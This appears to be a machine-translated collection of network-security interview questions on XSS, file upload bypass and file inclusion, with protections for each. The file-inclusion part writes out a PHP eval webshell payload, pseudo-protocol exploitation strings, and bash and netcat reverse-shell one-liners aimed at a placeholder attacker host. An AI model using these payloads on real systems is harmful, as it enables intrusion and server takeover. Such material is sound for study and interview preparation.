Article directory
- Preface
- topic
-
- 1.XSS vulnerability principles, classification, differences, hazards, protection, and how to detect
- 2. Principles of file upload vulnerabilities, bypass methods, prerequisites for exploitation, and protection
- 3. The file includes principles, classifications, common functions and pseudo-protocols, how to protect, how to use and obtain webshell, and how to rebound shell
- Summarize
Preface
Collection of common interview questions for network security positions
topic
1.XSS vulnerability principles, classification, differences, hazards, protection, and how to detect
Principle:
XSS attacks usually refer to exploiting vulnerabilities left during web development and not strictly filtering user input, allowing the attacker to inject malicious instruction code into the web page through clever methods, allowing the user to load and execute malicious code created by the attacker. Web program.
Category: Reflective xss, storage xss, dom xss
Difference
1. Attack type
Reflected XSS: Non-persistent XSS, one-time attack
Storage XSS: Persistent XSS, the malicious code or script constructed by the attacker will be saved in the database, and the user will be attacked every time he accesses it.
DOM-type XSS: Non-persistent XSS, which is a vulnerability based on the DOM document object model and does not require interaction with the server.
2. Traffic trend
Reflective xss: browser-backend-browser
Storage xss: browser-backend-database-backend-browser
DOM type xss: URL-browser
Hazards:
- Steal various user accounts
- Steal user cookie data, impersonate user identities to enter the website
- Hijack user sessions, perform arbitrary operations
- Brush traffic, execute pop-up ads
- Spread worm viruses
Protection:
1. Strictly filter user input through blacklists and whitelists (such as script, alert, onerror and other keywords), and try to eliminate all unnecessary input content as much as possible 2. Filter
user input in various ways Encoding, decoding and escaping
3. Set the http only attribute so that cookie information cannot be read through js scripts, which can effectively prevent XSS attacks.
How to detect:
1. Manual injection detection: try manual injection where injection points may exist
2. Automated tool detection: for example, download the xss detection plug-in through bp, and then perform automated blasting where injection points may exist, or use automated vulnerabilities Scanning tools AWVS, Appscan for scanning detection
2. Principles of file upload vulnerabilities, bypass methods, prerequisites for exploitation, and protection
Principle:
1. Web applications open the file upload function, and do not impose sufficient restrictions on uploaded files, such as file suffix names, file contents, etc.; 2. When
developing and deploying programs, system characteristics and lax filtering are not taken into account.
3. An attacker can bypass restrictions through a web server parsing vulnerability, allowing arbitrary files to be uploaded.
Bypass method:
Client side bypass:
1. Delete browser event (onsubmit)
2. brup capture packet and modify suffix name
3. Construct upload form
Server-side detection bypass
1. Suffix name detection and bypass
1. Case bypass
2. Blacklist bypass (1. Modify addtype application/x-httpd-php .php3 in httpd.conf)
3. Windows features (. Space::$DATA)
4. Whitelist (requires cooperation The file contains vulnerabilities or parsing vulnerabilities)
5...htaccess (this method of exploitation must first change allow override to all in httpd.conf) and write SetHandler application/x-httpd-php .jpg)
6.apache parsing vulnerabilities (from right to left Parse suffix name)
2. MIME type detection and bypass
3. File content detection and bypass
4.00 truncation detection and bypass
5. Conditional competition detection and bypass
Prerequisites for utilization:
1. The Web server must enable the file upload function, and Web users can access it.
2. Web users have writable permissions on the target directory, and even have execution permissions.
3. The Web container can parse and execute the script we uploaded.
Protection:
1. Both client-side file name verification and server-side file name verification are turned on at the same time, and whitelist detection is used.
2. File header verification: Check whether the file header of the uploaded file matches the extension.
3. Isolate the uploaded files from the Web server, store them exclusively on a file server, and access them through file IDs. If you must store the files on the web server, you can remove the executable permissions of the folder where the files are stored.
4. Randomly rename the uploaded files.
3. The file includes principles, classifications, common functions and pseudo-protocols, how to protect, how to use and obtain webshell, and how to rebound shell
**Principle: **Program developers generally want the code to be more flexible, so they write reused functions into files and set the included files as variables for dynamic calls. However, since the user has control over this variable and the service The file inclusion vulnerability is caused by the client failing to do a reasonable check or the check being bypassed.
Classification:
File inclusion vulnerabilities can be divided into two types: local file inclusion and remote file inclusion.
The easiest way to distinguish between the two is to check whether allow_url_include is turned on in php.ini. If enabled, remote files may be included.
Remote file inclusion requires allow_url_include=On, allow_url_fopen = On in php.ini.
In php.ini, allow_url_fopen has always been On by default, while allow_url_include has been Off by default since php5.2.
Commonly used functions:
include(): The file is not included until include() is executed. If the included file is not found, a warning will be generated, and the subsequent script will be run. require()
: The file will be included as soon as the program is run. If the include is not found, The file will generate a fatal error, and the script execution will terminate
include_once() and require_once(): if the file include is run, it will not be run a second time.
Commonly used pseudo-protocols:
1.php://input
Example:
POST submission <?php fputs(fopen("hepeng.php","w"),"<?php @eval($_POST[123]); ?>" ); ?>
You can also use POST to submit using command execution
<?php system(echo "One sentence Trojan" > current absolute path/hepeng.php); ?>
2.php://filter
example:
?a=php:// filter/read=convert.base64-encode/resource=index.php
?a=php://filter/convert.base64-encode/resource=index.php
3.data://Example
:
?a=data:// text/plain,<One sentence Trojan>
?a=data://tetx/plain;base64,ciphertext4.phar
://
?a=phar://absolute path/hepeng.jpg(zip)/b.txt
5.zip://
?a=zip://absolute path/hepeng.jpg%23b.txt
and file://, http://, ftp://
Protection:
1. Strictly judge whether the parameters in the inclusion are externally controllable, because the key to the success of file inclusion vulnerability lies in whether the included file can be controlled externally.
2. Path restriction: restrict the included files to only be in a certain folder, prohibit directory jump characters, such as: ".../"
3. Included file verification: verify whether the included file is a member of the whitelist .
4. Try not to use dynamic inclusion. You can write it in the page that needs to be included, such as: include("test.php");
How to utilize and obtain webshell:
1. Upload file inclusion exploitation: Use the inclusion vulnerability to load the PHP code uploaded by the user through the inclusion function, thereby achieving code execution. The condition is that the attacker needs to know the physical storage path of the uploaded file, and also needs to have execution permissions on the directory where the uploaded file is located.
2. Log file inclusion exploit: An attacker can insert PHP code into a Web log and execute the PHP code contained in the Web log through a file inclusion vulnerability.
3. Sensitive file inclusion and utilization: File inclusion can directly read sensitive files in the operating system, such as current operating system information, username and password information, various configuration files, etc.
4. Temporary file inclusion and utilization: Take the Session file as an example. The session file is saved on the server side and stores sensitive user information. First find the Session file and include it once. You can find the file name by viewing the current Session value through the plug-in.
5. Remote file inclusion and utilization: To use the remote file inclusion function, you must first determine whether PHP has turned on the remote file inclusion function option. You need to modify it in the php.ini configuration file. After the modification, restart the Web container service to make it take effect. You can remotely obtain the server's information.
6. Pseudo-protocol utilization: Use files containing various PHP encapsulated pseudo-protocols to write one-sentence Trojans, and then use tools such as kitchen knives and ant swords to connect and obtain webshells.
Rebound shell:
1. bash
executes port monitoring on the attacking host: //port is the port number of the attacking host, and this port number is not occupied.
nc -lvp port
is executed on the target host:
bash -i >& /dev/tcp/ Attack host ip/port 0>&1 //port is the port number of the attack host.
2.nc (netcat) rebound
performs port monitoring on the attack host:
nc -lvvp port //port is the port number of the attack host, and this port number has not been Occupy and
execute on the target host:
nc -e /bin/bash Attack host ip port
3. Common scripts rebound
python, perl, Ruby, PHP, Java
A brief introduction, and a detailed explanation of the rebound shell will be given later.
Summarize
This issue briefly introduces a few questions, and we will continue to update them in the future, so you can pay attention!
Come on, hit the workers! ! ! Woo woo woo